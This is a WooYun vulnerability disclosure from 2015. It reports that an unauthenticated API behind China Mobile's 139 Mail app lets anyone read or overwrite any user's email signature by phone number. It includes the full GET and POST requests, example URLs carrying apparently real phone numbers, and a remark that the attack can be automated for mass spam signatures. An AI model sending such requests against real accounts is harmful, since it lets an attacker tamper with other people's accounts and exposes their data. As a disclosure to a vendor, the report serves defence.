139邮箱app可查看并设置任意用户邮件签名(可自动批量修改)

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0113490

漏洞标题：139邮箱app可查看并设置任意用户邮件签名(可自动批量修改)

漏洞作者：小手冰凉

提交时间：2015-05-11 19:33

修复时间：2015-06-29 16:08

公开时间：2015-06-29 16:08

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-05-11：细节已通知厂商并且等待厂商处理中
2015-05-15：厂商已经确认，细节仅向厂商公开
2015-05-25：细节向核心白帽子及相关领域专家公开
2015-06-04：细节向普通白帽子公开
2015-06-14：细节向实习白帽子公开
2015-06-29：细节向公众公开

简要描述：

139邮箱app可设置任意用户签名
用来发广告效果肯定好

详细说明：

手机登陆139邮箱app，抓取到如下数据包

GET /peStatistics/clientInterface/user/settings/<手机号>HTTP/1.1
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.1.1; Custom Phone - 4.1.1 - API 16 - 768x1280 Build/JRO03S)
Host: www.gdleadtone.com
Connection: Keep-Alive
Accept-Encoding: gzip

返回数据中是一串base64编码的用户邮件签名。观察数据包发现完全没有包含类似token这样的认证字段，也就是可以查看任意人的邮件签名。
例子

http://www.gdleadtone.com/peStatistics/clientInterface/user/settings/13905247273
http://www.gdleadtone.com/peStatistics/clientInterface/user/settings/13905246932
http://www.gdleadtone.com/peStatistics/clientInterface/user/settings/13905244566
http://www.gdleadtone.com/peStatistics/clientInterface/user/settings/13905241987
http://www.gdleadtone.com/peStatistics/clientInterface/user/settings/13905242001

同样在保存邮件签名设置时抓到如下数据包

POST /peStatistics/clientInterface/user/settings/save HTTP/1.1
Content-Length: 342
Content-Type: application/x-www-form-urlencoded
Host: www.gdleadtone.com
Connection: Keep-Alive
Accept-Encoding: gzip
mobileNum=<手机号>&settingString=NQclQmCFz000000YlLsiAM1DmgtifLlcoYzI3rz923Q0VMmSXrbyTJtEnzO10%2FtmIoXXMkBAYMc9tfpwRdP7ZiKF1zJMeKnf8sPtVPaP15fB%2BUhlzb3e83lBy1QubzQDqDYXKxhJmvjt5s21tk%2F7syTpNK59adkK7%2Fbbsh7yRbYcmmPZvBk4Tsex803w3okFp%2FyK4tOb7RYZovw8SsDMFkr0nRun03HUO7fbAHM7XVH%2BH2xhVLQA%2FRTNLjEdnfpLqXorBBLqodnr8X5n%2B3svlInq8yUQ%3D%3D

不难发现就是设置用户签名的接口。修改手机号能够设置任意用户邮件签名。
ps:这个网站<www.gdleadtone.com>很神奇，刚开通139邮箱的时候是查询不到签名的，需要等大约十几分钟，可能是从139的数据库同步过来的。

漏洞证明：

刚登录时，这是默认的用户签名

然后提交如下数据包

POST /peStatistics/clientInterface/user/settings/save HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=utf-8
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.1.1; Custom Phone - 4.1.1 - API 16 - 768x1280 Build/JRO03S)
Host: www.gdleadtone.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 212
mobileNum=<我的手机号>&settingString=NQclQmCFzYlLsiAM1DmgtifLlcoYzI3r8ccS0sBNV2l1jXW62j5AIF0%2FtmIoXXMkBAYMc9tfpwRdP7ZiKF1zJGOS9rdYriugxzAMKK3PEznb3e83lBy1QvIo4hUZr5h3S7PvYfyfmQbb3e83lBy1Ql4kZ3wzsMvbVhuDDamnMa0%3D

然后在重新登录邮箱

签名已经被修改。
这个过程完全可以自动化，遍历手机号，修改签名........

修复方案：

这个www.gdleadtone.com网站肯定还存在很多类似的非认证的接口,添加认证

版权声明：转载请注明来源小手冰凉@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：7

确认时间：2015-05-15 16:07

厂商回复：

CNVD未直接复现所述情况,已经转由CNCERT向中国移动集团公司通报,由其后续协调网站管理部门处置.

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0113490

漏洞标题：139邮箱app可查看并设置任意用户邮件签名(可自动批量修改)

相关厂商：中国移动

漏洞作者：小手冰凉

提交时间：2015-05-11 19:33

修复时间：2015-06-29 16:08

公开时间：2015-06-29 16:08

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源小手冰凉@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0113490

漏洞标题：139邮箱app可查看并设置任意用户邮件签名(可自动批量修改)

相关厂商：中国移动

漏洞作者： 小手冰凉

提交时间：2015-05-11 19:33

修复时间：2015-06-29 16:08

公开时间：2015-06-29 16:08

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0113490"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 小手冰凉@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：小手冰凉

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源小手冰凉@乌云